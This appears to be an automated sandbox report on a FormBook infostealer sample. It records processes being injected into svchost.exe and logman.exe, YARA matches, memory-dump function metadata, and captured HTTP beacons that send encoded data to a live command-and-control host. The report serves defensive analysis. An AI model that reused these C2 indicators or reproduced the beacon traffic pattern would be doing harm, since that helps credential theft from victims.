7	192.168.2.4	50009	101.32.205.61	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:19.865181923 CET	10858	OUT	POST /6xqt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.rwse6wjx.sbs Origin: http://www.rwse6wjx.sbs Referer: http://www.rwse6wjx.sbs/6xqt/ Cache-Control: max-age=0 Connection: close Content-Length: 10299 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 38 61 68 70 78 59 76 2f 77 56 32 74 64 71 77 55 4f 6d 43 69 48 72 50 68 61 38 30 75 75 30 6f 6e 6e 4c 2b 42 59 4f 79 54 70 6e 55 2f 49 7a 46 4e 41 73 50 31 36 4a 57 49 2b 79 4f 33 66 5a 53 71 76 73 66 59 33 41 78 44 43 47 30 79 2f 6a 69 58 35 52 6c 5a 39 64 62 57 46 6f 70 53 50 45 4f 4a 69 6f 75 43 54 63 6c 58 57 4b 4d 64 63 2b 52 43 69 5a 38 48 79 78 45 71 73 45 41 42 43 70 52 36 5a 69 70 75 4b 34 62 74 67 56 4a 46 42 7a 6e 67 53 41 4c 33 6c 51 4f 65 30 73 78 7a 70 66 47 76 63 6f 6f 35 59 6d 32 68 42 59 5a 6a 4d 69 39 43 66 55 68 51 55 75 4b 35 7a 71 33 45 46 39 77 65 37 73 4f 57 77 71 51 33 39 48 68 48 50 58 71 4a 2f 32 46 6a 2f 72 48 4f 6c 66 65 76 42 32 46 6c 36 62 4f 47 6d 52 55 53 55 33 61 30 4a 5a 71 52 62 55 70 34 62 77 51 49 6e 33 4f 44 6c 66 2b 5a 6c 47 53 4f 6f 46 4d 6a 48 62 6e 4e 43 69 78 69 50 59 47 4e 37 51 72 32 7a 69 77 2b 59 58 37 54 6b 70 68 7a 67 64 63 62 38 64 33 78 58 35 59 74 53 57 69 67 66 6b 37 54 66 61 4d 65 52 2b 6e 30 78 6c 79 53 31 46 59 64 30 61 79 5a 48 33 [TRUNCATED] Data Ascii: 6v=08ahpxYv/wV2tdqwUOmCiHrPha80uu0onnL+BYOyTpnU/IzFNAsP16JWI+yO3fZSqvsfY3AxDCG0y/jiX5RlZ9dbWFopSPEOJiouCTclXWKMdc+RCiZ8HyxEqsEABCpR6ZipuK4btgVJFBzngSAL3lQOe0sxzpfGvcoo5Ym2hBYZjMi9CfUhQUuK5zq3EF9we7sOWwqQ39HhHPXqJ/2Fj/rHOlfevB2Fl6bOGmRUSU3a0JZqRbUp4bwQIn3ODlf+ZlGSOoFMjHbnNCixiPYGN7Qr2ziw+YX7Tkphzgdcb8d3xX5YtSWigfk7TfaMeR+n0xlyS1FYd0ayZH3rn37bEdO9vcPtm2n/GZNV7ZtiJcYfacCpB/5XMTG3QSGF6FHu0COabKAGIxOdBpsZ4kbwlO6vP+kZEDplKiiYDwdeTwaXbGVrVQiwlm2hbXmjFL2e3slhA8tSCYJ2dF3+7wy5pByet2oDbnsQMCnFGgJhNkpnn/9FCO7gXOeS/kp8S7fzOCzqPzljzFnFdhhlcSM8jk6z8ubt0MLAL8ykg0fPfU4u/CG96QEfHTOeTZaCl3Q1qMAxzg3jAihQvoGM2OgLb20zqCE8UgPn7Za6vE7bqJt88tRt5t91nAL3jX47FEVJmCtE5Sf3hswjVBSJMXaGCoSehfqcSDdOyvN4HB6jC6cAZVuUvtNdcIES9DcD5gTANwGr65NiQP75lRlAMTuBDAoVMi4fSeoQPm2ec4FwBtE+BuzYSDdlN/P/AXlJOWuT2HwDQQfiBYAn4s/CEOfgrjXwC9RIZo8zulQtkZV8FfcCWo+1j0SoaBZOym8papyymZgh8yL8xSHW3JRB1SGRPakDRr8svUqE3wHopuNrLkimEOqLXXMGkXSDph6Z0R7LeULSGCbjtTvae8hNdOFgL7lThC8m510fA20RosX7G2tH0IcHxqVWwILJQsymVK2D8YhUqER3mXWu7vFu5ciWXAaCPfpe3ZYb19rldBIx6IOlP1BuV [TRUNCATED]
Jan 11, 2025 07:59:20.768802881 CET	306	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 06:59:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	50010	101.32.205.61	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:22.730654955 CET	494	OUT	GET /6xqt/?f2yX=YHuxGZkXvzspJ&6v=5+yBqFkMyRtNr+GeOMKnnCL8jbElscQwzEvWA86+RKe5k7i8BTcok4cHFvnpp+lCvMgcXFd4BCCry6S6UOloceQcAmQNddIHBDsKYw5bAFXTOryRDlwOHlE= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.rwse6wjx.sbs Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4
Jan 11, 2025 07:59:23.799175024 CET	306	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 06:59:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	01:57:16
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\YKzxWyqI6Y.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YKzxWyqI6Y.exe"
Imagebase:	0x200000
File size:	1'206'784 bytes
MD5 hash:	938E53EE0F2E2D91FDC330563A4C2597
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:57:21
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YKzxWyqI6Y.exe"
Imagebase:	0x260000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:58:04
Start date:	11/01/2025
Path:	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe"
Imagebase:	0x290000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:58:05
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\logman.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\logman.exe"
Imagebase:	0xc0000
File size:	98'816 bytes
MD5 hash:	AE108F4DAAB2DD68470AC41F91A7A4E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	01:58:19
Start date:	11/01/2025
Path:	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe"
Imagebase:	0x290000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:58:32
Start date:	11/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	18.1%
Total number of Nodes:	127
Total number of Limit Nodes:	10

Executed Functions

Function 00418E83 Relevance: 1.7, Strings: 1, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_H, xrefs: 0041912C

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: _H
API String ID: 0-941257363
Opcode ID: 9fdd47a768816631a35ff7414b2c15e05e79945e54928de824cae315aa46b048
Instruction ID: 89d8c62e40facd5ecbc075b510154c34838a53ab41a2fa8cd8211952cf0c7ed6
Opcode Fuzzy Hash: 9fdd47a768816631a35ff7414b2c15e05e79945e54928de824cae315aa46b048
Instruction Fuzzy Hash: 0DF1B270D0021AAFDB24DF94CC85BEEB7B9AF45304F1481AEE419A7241D7786E81CF95

Function 00418013 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418085

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 663dc7d4e0d5e14249f7d9a64ef8a06e88cb1fd94cd04888a9442dcc489ec44e
Instruction ID: 2268bf1ee31decd9043446d921cba534ea8b01035afebe40e7c03e09e141de60
Opcode Fuzzy Hash: 663dc7d4e0d5e14249f7d9a64ef8a06e88cb1fd94cd04888a9442dcc489ec44e
Instruction Fuzzy Hash: 3B0175B1E4010DBBDF10DBE1DC52FDEB7789B14304F0441AAE90897240F675EB488B95

Function 0042CF23 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CF5A

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 66e37e2c44c764b6559a53267874aa9a8ad1bd6f8c0a6ce7bea0fd80a21a473d
Instruction ID: c6fa16150c99d14561629d58b3365e63b36e8fc1a7bfed04b3749b26a3ca61fc
Opcode Fuzzy Hash: 66e37e2c44c764b6559a53267874aa9a8ad1bd6f8c0a6ce7bea0fd80a21a473d
Instruction Fuzzy Hash: 68E04F366406547BD210BA5ADC41FE7775CDBC5711F00842AFA18A7141C674791186F4

Function 03B735C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03B735CA

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
Instruction ID: 6d3f0a7fd700c1af7b1ee7544ffee1e5ba14dcc11acc517313fb4e5bdb75c2d1
Opcode Fuzzy Hash: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
Instruction Fuzzy Hash: FE90023260550803D100B2584554746100687D0305FA5C461A042856DD87A58A51A5A2

Function 03B72B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03B72B6A

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
Instruction ID: 6883436cc4b3e33e1af51a918e60fb2c4cb71e64b60be0741dbec88ddb88343b
Opcode Fuzzy Hash: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
Instruction Fuzzy Hash: E2900262202404034105B2584454656400B87E0305B95C071E1018595DC6358991A125

Function 03B72DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03B72DFA

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
Instruction ID: 2677b3914d151947ea7724144869cbad44b00278486d6215f6e4e6afbbbea5f4
Opcode Fuzzy Hash: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
Instruction Fuzzy Hash: E990023220140813D111B2584544747000A87D0345FD5C462A042855DD97668A52E121

Function 00401C03 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401C59

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 2845b74128acd864cc270f73d7afcf600e477c6b8487353ffe7e4c6f3e8085a0
Instruction ID: a445a7085a003811a11c9ec6d1ed029ed45b1ee1ee980d0a8883ba495300a206
Opcode Fuzzy Hash: 2845b74128acd864cc270f73d7afcf600e477c6b8487353ffe7e4c6f3e8085a0
Instruction Fuzzy Hash: EE414871B002094BDB1C895D8CD02AEB652EBD4345F98817BDD0AEF3D0E639AD158784

Function 004147F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-4248133,00000111,00000000,00000000), ref: 0041488A

Strings

-4248133, xrefs: 0041487F, 00414889, 0041489A
-4248133, xrefs: 00414891, 00414894

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -4248133$-4248133
API String ID: 1836367815-1105601687
Opcode ID: ca6a487dda611855f1c33d96c4369cf6045353f4b47da6f67788a08ff41f3b95
Instruction ID: a2a8ca94cf63818c6698b162807faa37b50689aa0ff434be10f7ddfb4c5376fb
Opcode Fuzzy Hash: ca6a487dda611855f1c33d96c4369cf6045353f4b47da6f67788a08ff41f3b95
Instruction Fuzzy Hash: 931180779041887AD7129EA5ACC1DEEBBDCDEC1324B5540AFE90497201E62D4E0187A9

Function 00414813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-4248133,00000111,00000000,00000000), ref: 0041488A

Strings

-4248133, xrefs: 0041487F, 00414889, 0041489A
-4248133, xrefs: 00414891, 00414894

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -4248133$-4248133
API String ID: 1836367815-1105601687
Opcode ID: f4c60a8a5adfab47b2836613c9b40cb95501f073101b286ea115408d7e7b61b2
Instruction ID: 60aff755db79143941f0e636c01a10aedf76aed03e3f228be1ead05d16e6f2b9
Opcode Fuzzy Hash: f4c60a8a5adfab47b2836613c9b40cb95501f073101b286ea115408d7e7b61b2
Instruction Fuzzy Hash: E601DB71D0021C7ADB11AEE19C81DEF7B7CDF85398F448079FA1477241D6784E0647A6

Function 0042D283 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D2BF

Strings

dmA, xrefs: 0042D286

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: dmA
API String ID: 3298025750-1628954114
Opcode ID: d4a8a7024bdc932b95696ddc2ea0d067eb24fa7e48327ac5e00225a2a728a517
Instruction ID: 6e383133445e9464a595843cb24b64443915e39cf5fb3bff6678034a5e39a513
Opcode Fuzzy Hash: d4a8a7024bdc932b95696ddc2ea0d067eb24fa7e48327ac5e00225a2a728a517
Instruction Fuzzy Hash: ECE092B6201604BBD610EE5ADC41FEB37ACDFC9750F004429FD18A7241DA74BD108BB8

Function 00418093 Relevance: 1.6, APIs: 1, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418085

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8945ea485863114d7cf6fc3942e316c2c0e0ceb4d20901a4916cf5a8d20a4dac
Instruction ID: e40452ea7207384326902b6a694c5f8f2d2eee145f42e8d11f16a53c5d269cd2
Opcode Fuzzy Hash: 8945ea485863114d7cf6fc3942e316c2c0e0ceb4d20901a4916cf5a8d20a4dac
Instruction Fuzzy Hash: 40019E31644209ABC311C97C8C54EDEBF5AEF85621F14825DE4144B2C2DF706A898796

Function 0042D233 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EDCE,?,?,00000000,?,0041EDCE,?,?,?), ref: 0042D26F

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2bfa40d63a8a666460584f630a70100d72cf5677f796b426a055d9b508936b0c
Instruction ID: 3298cd9f378cf93bc36eaa72d3755e42f685f5f6eea1af0757708df55363695b
Opcode Fuzzy Hash: 2bfa40d63a8a666460584f630a70100d72cf5677f796b426a055d9b508936b0c
Instruction Fuzzy Hash: 53E06D72204204BBD610EE99DC41FEB33ADDFC9710F004429F918A7242CA74B9148AB4

Function 0042D2D3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,34CC4047,?,?,34CC4047), ref: 0042D30A

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2d530c0058bdc4df223332db19347b63183e3dd717e50f21c59cdcc0ad2c7365
Instruction ID: 9481cf4117eadcc0fd0ace5bb4a4b9c7fac9ecc2791941da665ac26d03a7990a
Opcode Fuzzy Hash: 2d530c0058bdc4df223332db19347b63183e3dd717e50f21c59cdcc0ad2c7365
Instruction Fuzzy Hash: D9E04636200614BBD220EB6ADC42FAB776DDBC5724F41842AFA08A7242C7B4B91086E4

Function 03B72C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03B72C24

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
Instruction ID: 2d487d78435103e02e83cb6e19726c3fe49692e4e1fd981e6f54681be026d0e3
Opcode Fuzzy Hash: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
Instruction Fuzzy Hash: D9B09B729015C5C6DA11F77046087177905E7D0705F59C4F1D3134646E4739C1D1E175

Non-executed Functions

Function 03BB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MinimumStackCommitInBytes, xrefs: 03BB2BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 03BB2579
DisableExceptionChainValidation, xrefs: 03BB275F
@, xrefs: 03BB2B74
@, xrefs: 03BB2942
GlobalFlag2, xrefs: 03BB2FC0
ExecuteOptions, xrefs: 03BB25A0
DisableHeapLookaside, xrefs: 03BB246D
GlobalFlag, xrefs: 03BB2F3F, 03BB3059
minkernel\ntdll\ldrinit.c, xrefs: 03BB3187
LdrpInitializeExecutionOptions, xrefs: 03BB317D
MaxDeadActivationContexts, xrefs: 03BB2D82
CFGOptions, xrefs: 03BB2967
FrontEndHeapDebugOptions, xrefs: 03BB2489
UnloadEventTraceDepth, xrefs: 03BB24C0
ShutdownFlags, xrefs: 03BB24A1
UseImpersonatedDeviceMap, xrefs: 03BB251C
Initializing the application verifier package failed with status 0x%08lx, xrefs: 03BB3176
MaxLoaderThreads, xrefs: 03BB24EC
TracingFlags, xrefs: 03BB2549

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
Instruction ID: 1a322a24e684f4f9d6bdef06fd434efbcae922b5a2ced3147a7cb9e5cb62d822
Opcode Fuzzy Hash: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
Instruction Fuzzy Hash: 14925C75604741AFD724DE14C884BAAB7F8EB84758F084DBDFA98DB250DBB0E844CB52

Function 03B268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

SE_GetProcAddressForCaller, xrefs: 03B26A59
SE_DllLoaded, xrefs: 03B26978
SE_InstallBeforeInit, xrefs: 03B2691E
SE_LdrEntryRemoved, xrefs: 03B269D2
SE_ShimDllLoaded, xrefs: 03B268F1
minkernel\ntdll\ldrinit.c, xrefs: 03B89BC3
SE_LdrResolveDllName, xrefs: 03B26A2C
apphelp.dll, xrefs: 03B2698A
SE_InitializeEngine, xrefs: 03B268C5
ApphelpCheckModule, xrefs: 03B26A86
SE_ProcessDying, xrefs: 03B269FF
Could not locate procedure "%s" in the shim engine DLL, xrefs: 03B89BB3
SE_DllUnloaded, xrefs: 03B269A5
LdrpGetShimEngineInterface, xrefs: 03B89BB9
SE_InstallAfterInit, xrefs: 03B2694B

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-3089669407
